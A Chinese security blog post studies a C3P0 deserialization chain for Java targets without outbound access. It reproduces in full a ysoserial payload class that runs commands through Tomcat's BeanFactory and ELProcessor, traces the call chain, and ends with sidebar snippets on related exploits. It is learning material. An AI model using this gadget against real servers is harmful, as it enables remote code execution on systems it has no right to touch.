[Java安全]C3P0反序列化不出网利用学习

最新推荐文章于 2024-03-12 11:04:01 发布
最新推荐文章于 2024-03-12 11:04:01 发布
阅读量1.3k 收藏
点赞数 2
分类专栏: 安全学习 # Java代码审计 文章标签: java tomcat
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/solitudi/article/details/120736593
版权

文章目录

参考文章

本文复现了雨了个雨师傅的文章,思路很好,看完以后其实和JNDI8u191后的绕过思路一致,这个等下再复现学习

利用链构造

在昨天看了Ysoserial的基本过程以后其实这个就相对简单了,不一样的地方就是后面Ysoserial用了URLClassLoader,而这个是当前线程下的ClassLoader,曾经一直觉得没用,还是自己学的太少了,大佬想到通过Tomcat的getObjectInstance方法调用ELProcessor的eval方法实现表达式注入
在这里插入图片描述

package ysoserial.payloads;


import java.io.PrintWriter;
import java.sql.SQLException;
import java.sql.SQLFeatureNotSupportedException;
import java.util.logging.Logger;

import javax.naming.NamingException;
import javax.naming.Reference;
import javax.naming.Referenceable;
import javax.naming.StringRefAddr;
import javax.sql.ConnectionPoolDataSource;
import javax.sql.PooledConnection;

import com.mchange.v2.c3p0.PoolBackedDataSource;
import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase;

import org.apache.naming.ResourceRef;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.Dependencies;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;
import ysoserial.payloads.util.Reflections;


/**
 yulegeyu modified
 */
@PayloadTest ( harness="ysoserial.test.payloads.RemoteClassLoadingTest" )
@Dependencies( { "com.mchange:c3p0:0.9.5.2" ,"com.mchange:mchange-commons-java:0.2.11"} )
@Authors({ Authors.MBECHLER })
public class C3P0Tomcat implements ObjectPayload<Object> {
    public Object getObject ( String command ) throws Exception {

        PoolBackedDataSource b = Reflections.createWithoutConstructor(PoolBackedDataSource.class);
        Reflections.getField(PoolBackedDataSourceBase.class, "connectionPoolDataSource").set(b, new PoolSource("org.apache.naming.factory.BeanFactory", null));
        return b;
    }

    private static final class PoolSource implements ConnectionPoolDataSource, Referenceable {

        private String className;
        private String url;

        public PoolSource ( String className, String url ) {
            this.className = className;
            this.url = url;
        }

        public Reference getReference () throws NamingException {
            ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null);
            ref.add(new StringRefAddr("forceString", "x=eval"));
            String cmd = "calc";
            ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['cmd','/c','"+ cmd +"']).start()\")"));
            return ref;
        }

        public PrintWriter getLogWriter () throws SQLException {return null;}
        public void setLogWriter ( PrintWriter out ) throws SQLException {}
        public void setLoginTimeout ( int seconds ) throws SQLException {}
        public int getLoginTimeout () throws SQLException {return 0;}
        public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;}
        public PooledConnection getPooledConnection () throws SQLException {return null;}
        public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;}

    }


    public static void main ( final String[] args ) throws Exception {
        PayloadRunner.run(C3P0Tomcat.class, new String[]{"calc"});
    }

}

利用链分析

有些细节就不扣了,在Ysoserial那篇分析过了,简单来跟踪下调用链,PoolBackedDataSourceBasereadObject
首先第一个恢复出的对象ReferenceSerializedIndirectlySerialized的实例
在这里插入图片描述
跟进getObject的调用,继续跟进referenceToObject
在这里插入图片描述
不同于之前,这次我们让var11null
在这里插入图片描述
这里实例化了org.apache.naming.factory.BeanFactory
在这里插入图片描述
就入上面所说的
org.apache.naming.factory.BeanFactorygetObjectInstance()中会通过反射的方式实例化Reference所指向的任意Bean Class,并且会调用setter方法为所有的属性赋值。
而该Bean Class的类名、属性、属性值,全都来自于Reference对象,均是攻击者可控的
在这里插入图片描述
反射调用
在这里插入图片描述
可以看到这里成功触发
在这里插入图片描述

Y4tacker
关注
专栏目录
fastjson-c3p0:fastjson不出回显利用
03-19
fastjson-c3p0 fastjson不出回显利用 POST /json HTTP/1.1 Host: 127.0.0.1:8999 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Accept-Encoding: gzip, deflate cmd: dir Acce
C3P0 反序列化
01-26 641
C3P0 反序列化 依赖 <dependency> <groupId>com.mchange</groupId> <artifactId>c3p0</artifactId> <version>0.9.5.2</version> </dependency> Gadget /* * Gadget: * PoolBackedDataSourceBase#readObject *
[Java反序列化]C3P0反序列化
feng的博客
03-01 675
[Java反序列化]C3PO反序列化 环境 <dependency> <groupId>com.mchange</groupId> <artifactId>c3p0</artifactId> <version>0.9.5.2</version> </dependency> 什么是c3p0 C3P0是一个开源的
[Java反序列化]—C3P0反序列化
Sentiment的博客
11-11 1430
文章首发于先知社区:https://xz.aliyun.com/t/11830
Java安全反序列化-c3p0触发类加载POP链分析_ysoserial C3P0 PoC分析_不出利用c3p0实现类加载RCE
Ho1aAs‘s Blog
03-14 2030
文章目录前言代码复现工具类PoC代码审计 | 原理分析1. ReferenceSerialized.getObject()触发类加载2. ReferenceIndirector.indirectForm()创建ReferenceSerialized实例3. PoolBackedDataSourceBase反序列化触发IndirectlySerialized.getObject()4. PoolBackedDataSourceBase.writeObject()序列化IndirectlySerialized对
基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用
最新发布
07-01
【作品名称】:基于 Java 的亿赛通电子文档安全管理系统XStream反序列化漏洞任意文件上传利用 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
Java反序列化漏洞利用工具V1.7.jar
03-25
Java反序列化漏洞利用工具
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic中,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:反序列化漏洞。 反序列化漏洞通常出现在程序中,当接收到从络或持久存储中读取的数据,并将其转换回原来的对象实例时...
[Java安全]Java反序列化C3P0利用URLClassLoader
Y4tacker的博客
10-12 698
文章目录C3P0是什么实现不调用构造参数创建对象利用链分析 C3P0是什么 C3P0是一个开源的JDBC连接池,它实现了数据源和JNDI绑定,支持JDBC3规范和JDBC2的标准扩展。目前使用它的开源项目有Hibernate,Spring等 实现不调用构造参数创建对象 这个东西在后面利用链生成的过程中实现了,为什么ysoserial使用这个猜测是为了节省不必要的变量吧,payload更短 可以参考下这篇文章Java ReflectionFactory 利用链分析 首先是生成的过程,前面部分分割最后一个:获取
【Web】浅聊Java反序列化C3P0——不出Hex字节码加载利用
uuzeray的博客
03-08 971
不出的情况下,这个C3P0的Gadget可以和fastjson,Snake YAML , JYAML,Yamlbeans , Jackson,Blazeds,Red5, Castor等配合使用(调用setter和初始化方法)
【Web】浅聊Java反序列化C3P0——URLClassLoader利用
uuzeray的博客
03-08 1184
这条链最让我眼前一亮的就是对接口的有无进行了一个玩,相较之前纯粹跟全继承接口的链子,思考又多了一个维度。(虽然不是关键)pom依赖C3P0是一个开源的JDBC连接池,它实现了数据源和JNDI绑定,支持JDBC3规范和JDBC2的标准扩展。目前使用它的开源项目有Hibernate,Spring等。连接池类似于线程池,在一些情况下我们会频繁地操作数据库,此时Java在连接数据库时会频繁地创建或销毁句柄,增大资源的消耗。
Java 反序列化C3P0学习
蚁景网安学院
10-10 772
图片有点多,请耐心阅读哦0x01 前言再多打一点基础吧,后续打算先看一看 XStream,Weblogic,strusts2 这些个0x02 C3P0 组件介绍C3P0 是一个开源的 JDBC 连接池,它实现了数据源和 JNDI 绑定,支持 JDBC3 规范和 JDBC2 的标准扩展。目前使用它的开源项目有 Hibernate,Spring 等。JDBC 是 Java DataBase Conne...
Javaweb安全——反序列化漏洞-C3P0
weixin_43610673的博客
10-25 2180
C3P0是一个开源的JDBC连接池,它实现了数据源与JNDI绑定,支持JDBC3规范和实现了JDBC2的标准扩展说明的Connection和Statement池的DataSources对象。即将用于连接数据库的连接整合在一起形成一个随取随用的数据库连接池(Connection pool)。..............自下向上的调用,从lookup看着像一个jndi注入,调用链比较短,直接静态审计源码试试。还原属性赋值跟到的内部类的方法。
Apache Shiro 1.2.4 反序列化漏洞(CVE-2016-4437 )
热门推荐
内心不种满鲜花就会长满杂草
03-28 1万+
Shiro 1.2.4 反序列化漏洞
代码审计-ysoserial-C3P0分析
cdyunaq的博客
11-22 257
介绍 C3P0是一个开源的JDBC连接池,它实现了数据源和JNDI绑定,支持JDBC3规范和JDBC2的标准扩展。目前使用它的开源项目有Hibernate、Spring等。 基础使用 先看看ysoserial中需要的依赖是啥,方便后期调试也可以用 Pom.xml <!-- https://mvnrepository.com/artifact/com.mchange/c3p0 --> <dependency> <groupId>com.mchange&.
记一次Shiro实战(目标不出
m0_49936858的博客
08-13 1286
获取Webshell 可以在能够回显的情况下直接在使用者给出的路径(目录需要真实存在)下写入 webshell, webshell 名称和后缀名由使用者自行指定,webshell 的内容从 config 目录下的 shell.jsp 中读取。直接在工具中选择获取webshell,然后填入想写入的路径+webshell的名字,比如https://xxxxx/fxqgl/static/flash/ini.jsp ,ini.jsp是我自己命名的。1.在工具的哪个地方上传木马。3. 找上传木马的地方。...
【Web】浅聊Hessian反序列化之打Rome出&不出
uuzeray的博客
03-12 992
正如我们前文所说,当Hessian反序列化Map类型的对象的时候,会自动调用其put方法,而put方法又会牵引出各种相关利用链打法。map.put对于HashMap会触发key.hashCode()。利用到hashCode的链子有很多,如CC6和Rome相关链,但很遗憾的是CC6因为一些原因无法使用,后面会出一篇文章专门讲其原因。本文主要讲一下Rome出不出的两种利用方式。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值